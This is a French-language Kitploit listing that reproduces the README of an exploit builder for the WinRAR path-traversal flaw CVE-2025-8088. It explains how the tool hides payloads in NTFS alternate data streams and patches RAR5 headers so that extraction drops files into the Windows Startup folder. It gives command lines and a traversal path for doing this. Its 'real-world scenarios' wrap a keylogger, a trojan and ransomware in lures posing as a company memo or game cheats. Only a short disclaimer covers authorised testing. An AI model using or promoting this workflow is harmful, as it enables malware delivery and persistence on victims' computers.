Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
WinRAR-Exploit-Tool---Rust-Edition — Une implémentation haute performance et sécurisée en mémoire de l'outil d'exploitation WinRAR CVE-2025-8088, réécrite en Rust pour une meilleure fiabilité et performance. | Kitploit
Outils/GitHubGitHub/kitsuneshade/winrar-exploit-tool---rust-edition
Mécanismes de PersistanceExploitationExploitation d'Applications WebPost-ExploitationTests d'IntrusionApprentissage et ÉducationRed TeamingDéveloppement de Charges UtilesExploitation de Binaires

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHubkitsuneshade/winrar-exploit-tool---rust-edition

WinRAR-Exploit-Tool---Rust-Edition

Une implémentation haute performance et sécurisée en mémoire de l'outil d'exploitation WinRAR CVE-2025-8088, réécrite en Rust pour une meilleure fiabilité et performance.

Voir le dépôt
83il y a 11 moisPas encore vérifié

WinRAR Exploit Tool - Édition Rust

Outil d'exploitation de traversée de chemin WinRAR avancé - Écrit en Rust

Une implémentation haute performance et sécurisée en mémoire de l'outil d'exploitation WinRAR CVE-2025-8088, réécrite en Rust pour une meilleure fiabilité et performances.

Fonctionnalités

  • Exploitation ADS - Flux de données alternatifs NTFS pour le masquage de la charge utile
  • Manipulation d'en-tête RAR5 - Correction directe de l'en-tête pour l'injection de chemin
  • GUI moderne - Interface basée sur GTK avec style CSS
  • Ciblage du démarrage - Placement automatique de la charge utile dans le démarrage Windows
  • Prise en charge de leurre personnalisé - Utilisez vos propres fichiers leurres ou un leurre par défaut
  • Prise en charge universelle des fichiers - Prend en charge tout type de fichier pour la charge utile et le leurre
  • Gestion d'erreurs robuste - Vérification et diagnostic complets des erreurs
  • Diagnostics système - Vérification automatique de la compatibilité système
  • Efficacité mémoire - Faible empreinte mémoire avec une gestion intelligente des ressources

Prérequis

  • Rust 1.70+ - Chaîne d'outils Rust moderne
  • Bibliothèques de développement GTK - Pour le support GUI
  • WinRAR CLI - Pour la création d'archives RAR
  • Windows 10/11 - Prise en charge NTFS requise

Démarrage rapide

1. Installer Rust

root@kitploit:~
# Install Rust using rustup


# Verify installation
rustc --version
cargo --version

2. Installer les bibliothèques de développement GTK

Windows (MSVC)

root@kitploit:~
# Using vcpkg
vcpkg install gtk:x64-windows

Ou avec MSYS2

root@kitploit:~
pacman -S mingw-w64-x86_64-gtk4

3. Cloner et compiler

root@kitploit:~
# Navigate to the rust project
cd winrar_exploit_rust

# Build in debug mode
cargo build

# Build optimized release
cargo build --release

# Run the application
cargo run --release

Utilisation

  1. Sélectionner la charge utile - Choisissez n'importe quel fichier comme charge utile (.exe, .bat, .jpg, .pdf, etc.)
  2. Choisir un leurre - Sélectionnez n'importe quel fichier comme leurre (un leurre par défaut sera créé si vide)
  3. Nommer l'archive - Entrez le nom du fichier RAR de sortie
  4. Construire - Générer l'archive d'exploitation

Exemples

Utilisation de base

Créez une exploitation simple avec un fichier de charge utile et un leurre :

root@kitploit:~
# Create exploit with executable payload
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "exploit.rar"

# Create exploit with script payload
.\winrar_exploit_rust.exe create --payload "C:\malicious.ps1" --decoy "C:\document.pdf" --output "malicious.rar"

Utilisation avancée

Plusieurs fichiers leurres

root@kitploit:~
# Use multiple decoy files separated by commas
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\photo.jpg,C:\document.pdf,C:\video.mp4" --output "multi_decoy.rar"

Répertoire de dépôt personnalisé

root@kitploit:~
# Specify custom directory where payload will be placed
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "custom_drop.rar" --drop_dir "C:\Users\Victim\Desktop"

Différents types de charge utile

root@kitploit:~
# Image payload (steganography)
.\winrar_exploit_rust.exe create --payload "C:\malicious.jpg" --decoy "C:\innocent.txt" --output "image_exploit.rar"

# PDF payload
.\winrar_exploit_rust.exe create --payload "C:\trojan.pdf" --decoy "C:\readme.txt" --output "pdf_exploit.rar"

# Batch script payload
.\winrar_exploit_rust.exe create --payload "C:\ransomware.bat" --decoy "C:\instructions.txt" --output "batch_exploit.rar"

Diagnostics système

root@kitploit:~
# Run system diagnostics to check compatibility
.\winrar_exploit_rust.exe diagnose

# Show available tools and features
.\winrar_exploit_rust.exe tools

Scénarios réels

Scénario 1 : Environnement d'entreprise

root@kitploit:~
# Create a malicious document that looks like a company memo
.\winrar_exploit_rust.exe create --payload "C:\keylogger.exe" --decoy "C:\company_memo.pdf" --output "important_memo.rar"

Scénario 2 : Communauté de jeux

root@kitploit:~
# Hide malware in a game cheat file
.\winrar_exploit_rust.exe create --payload "C:\trojan.exe" --decoy "C:\game_cheat.txt,C:\screenshot.jpg" --output "cheats.rar"

L'outil crée des archives RAR avec traversée de chemin en utilisant :

  1. Création ADS - Cache la charge utile dans les flux de données alternatifs NTFS
  2. Construction RAR - Crée une base RAR avec ADS en utilisant WinRAR CLI
  3. Correction d'en-tête - Injecte le chemin de traversée dans les en-têtes RAR5
  4. Recalcul CRC - Assure l'intégrité de l'archive
  5. Sortie - Fournit le RAR malveillant prêt à être extrait

Exemple de chemin : ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe

Types de fichiers pris en charge

Fichiers de charge utile :

  • ✅ Exécutables (.exe, .bat, .cmd)
  • ✅ Scripts (.py, .js, .vbs, .ps1)
  • ✅ Documents (.pdf, .docx, .xlsx)
  • ✅ Images (.jpg, .png, .gif)
  • ✅ Vidéos (.mp4, .avi)
  • ✅ Audio (.mp3, .wav)
  • ✅ Tout type de fichier

Fichiers leurres :

  • ✅ Fichiers texte (.txt, .doc, .pdf)
  • ✅ Images (.jpg, .png, .gif, .bmp)
  • ✅ Vidéos (.mp4, .avi)
  • ✅ Audio (.mp3, .wav)
  • ✅ Documents (.docx, .xlsx)
  • ✅ Tout type de fichier

Architecture

root@kitploit:~
winrar_exploit_rust/
├── src/
│   ├── main.rs          # Application entry point
│   ├── gui.rs           # GTK-based user interface
│   ├── exploit.rs       # Core exploit logic
│   ├── ads.rs           # NTFS ADS manipulation
│   ├── rar.rs           # RAR5 header manipulation
│   ├── diagnostics.rs   # System diagnostics
│   └── error.rs         # Error handling
├── Cargo.toml           # Dependencies and build config
└── README.md           # This file

Dépannage

L'outil comprend des diagnostics automatiques qui vérifient :

  • ✅ Installation de WinRAR CLI
  • ✅ Prise en charge des ADS NTFS
  • ✅ Permissions du répertoire de démarrage
  • ✅ Disponibilité de la bibliothèque GTK
  • ✅ Compatibilité du système de fichiers

Problèmes courants :

  1. "GTK not found"

    root@kitploit:~
    # Install GTK development libraries
    # Windows (vcpkg)
    vcpkg install gtk:x64-windows
    
    # Or using MSYS2
    pacman -S mingw-w64-x86_64-gtk4
    
  2. "WinRAR CLI not found"

    • Install WinRAR from https://www.winrar.com
    • Ensure rar.exe is in Program Files
  3. "Cannot write to startup directory"

    • Run the tool as Administrator
    • Check folder permissions
  4. "NTFS ADS not supported"

    • Ensure you're using NTFS file system
    • ADS is not supported on FAT32/exFAT
  5. Compilation Errors

    root@kitploit:~
    # Update Rust toolchain
    rustup update
    
    # Clean and rebuild
    cargo clean
    cargo build --release
    

Formatage du code

root@kitploit:~
# Format code
cargo fmt

# Lint code
cargo clippy

Dépendances

Les dépendances principales incluent :

  • gtk - Framework GUI moderne
  • tokio - Exécution asynchrone
  • windows - Liaisons API Windows
  • crc32fast - Calcul CRC32 rapide
  • byteorder - Manipulation de l'ordre des octets
  • anyhow - Gestion d'erreurs

Considérations de sécurité

  • But éducatif : Cet outil est destiné uniquement aux tests autorisés et à des fins éducatives
  • Environnement contrôlé : Utilisez-le uniquement dans des environnements contrôlés avec un consentement approprié
  • Conformité légale : Assurez-vous de respecter les lois et réglementations applicables
  • Divulgation responsable : Suivez les pratiques de divulgation responsable

Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

Auteur

Créé par @kanonufo sur Telegram


Outil red team haute performance pour l'exploitation de CVE-2025-8088 - Édition Rust

Télécharger l’outil